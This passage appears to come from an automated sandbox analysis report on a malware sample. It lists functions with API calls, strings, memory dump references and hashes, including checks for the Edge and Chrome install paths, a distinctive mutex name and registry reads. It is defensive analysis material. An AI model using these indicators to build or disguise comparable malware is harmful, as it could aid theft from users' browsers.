                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • \Microsoft\Edge\Application\msedge.exe, xrefs: 1000642B
                                                                                                                                                                                                                                                                                                                              • ProgramFiles, xrefs: 100063D6
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: ProgramFiles$\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-1265440269
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 4d6c7aecff4a5cf372fd0c542226d917747f012b197270284a3a5c4471654fcb
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b3486840681a8c9b7979fbf1c3b21a1cb547e06702c49159833d47058733cd9d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d6c7aecff4a5cf372fd0c542226d917747f012b197270284a3a5c4471654fcb
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F821D675D00204DBEB14DFA8CC05BEFB7F9FF08784F608519E916A3284DB74A9058BA0
                                                                                                                                                                                                                                                                                                                              Function 10005F20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Google\Chrome\,0000001D,00000000,-00000002), ref: 10005FBB
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-4188645398
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d6f36605941e29b4e518cb00cbc8439ec4a4da0f67758156a23e7e18ed3b3d03
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 77d355c08a898f8e50a63f28947c03bc0e31e75e4281b3d97ed022a44253448f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6f36605941e29b4e518cb00cbc8439ec4a4da0f67758156a23e7e18ed3b3d03
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E21A175D04205DAEB14DFA8CC05BEFB7F8EF08741F508529E816A3284DB74A5058BA0
                                                                                                                                                                                                                                                                                                                              Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                                              • String ID: fyhstga-ONSWMZ
                                                                                                                                                                                                                                                                                                                              • API String ID: 1925916568-3275725708
                                                                                                                                                                                                                                                                                                                              • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                                                                                                                                                                                                                                              Function 10004460 Relevance: 4.6, APIs: 3, Instructions: 123COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 100044DE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                                                                                                              • new.LIBCMT ref: 100044E4
                                                                                                                                                                                                                                                                                                                              • new.LIBCMT ref: 100044F8
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Concurrency::cancel_current_taskException@8Throw
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3598223435-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a64682e58749376715ff285614fed1e7cc0981f6ee9bc294163a27801b01aede
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4acf8bbac3f2c21882ea0e06343d40b90099298c012174ff2abe7d7d1e891cfc
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a64682e58749376715ff285614fed1e7cc0981f6ee9bc294163a27801b01aede
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 504104F1A00A018BF724DF68D880719B7E5EB452D1F120B2DE8538B68ADF70E944C7A6
                                                                                                                                                                                                                                                                                                                              Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 1a25bcfb25f4c61a33ed6ceb80866840e5ee7adcdacacd2e2e41860cf5e9bac8
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a25bcfb25f4c61a33ed6ceb80866840e5ee7adcdacacd2e2e41860cf5e9bac8
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                                                                                                                                                                                                                                              Function 0041265D Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e356916b1740155a69653a68473027dca2ca6835ab0d3846d735c0fff301d5eb
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e356916b1740155a69653a68473027dca2ca6835ab0d3846d735c0fff301d5eb
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                                                                                                                                                                                                                                                                                              Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                                                                                                                                                                                                                                              Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                                                                                                                                                                                                                                              Function 10003970 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-2556327735
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 6286ed2b3d2a47bb2dee5ce7ba8b1cd80560161d0f5bf200cb9f8635a59c1772
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d9b5a441fad115623de32c345b1d9ad73cd1efb64c790b8918f6d176f17e22e0
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6286ed2b3d2a47bb2dee5ce7ba8b1cd80560161d0f5bf200cb9f8635a59c1772
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD3197323147118BA622DE5CE88085BF3EDFF95691320462FE5C6C7654DB62AD4487A1
                                                                                                                                                                                                                                                                                                                              Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                                                                                                                                                              • String ID: xAG
                                                                                                                                                                                                                                                                                                                              • API String ID: 176396367-2759412365
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3cd24ee7cf2bbd971f19c3cfa9fc21255a7d7322a241340b9fd7b504d1626de8
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 06a27fc39790a6443aa461e0e984232ee7603be4cd8470566e0b89af9a4a2a71
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cd24ee7cf2bbd971f19c3cfa9fc21255a7d7322a241340b9fd7b504d1626de8
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE1163329002059FCB15FF66D8969EF77A4EF64314B10453FF842622E2EF38A955CB98
                                                                                                                                                                                                                                                                                                                              Function 100050B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10005126
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                                                                                                              • Opcode ID: eaa0f217be8f3647f415baa461963154c0a712c6ea737dd33bf379e98b84d204
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 95843a031e05dac2a709eefcd5697d94da0e28df2c028df6d7444b4865a14f8d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eaa0f217be8f3647f415baa461963154c0a712c6ea737dd33bf379e98b84d204
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B101B9322007445AF731CD4C988165FF3E9EBD12F5B760E1FE69197545D7736C4082A5
                                                                                                                                                                                                                                                                                                                              Function 0041A955 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A969
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                                                                                              • String ID: @
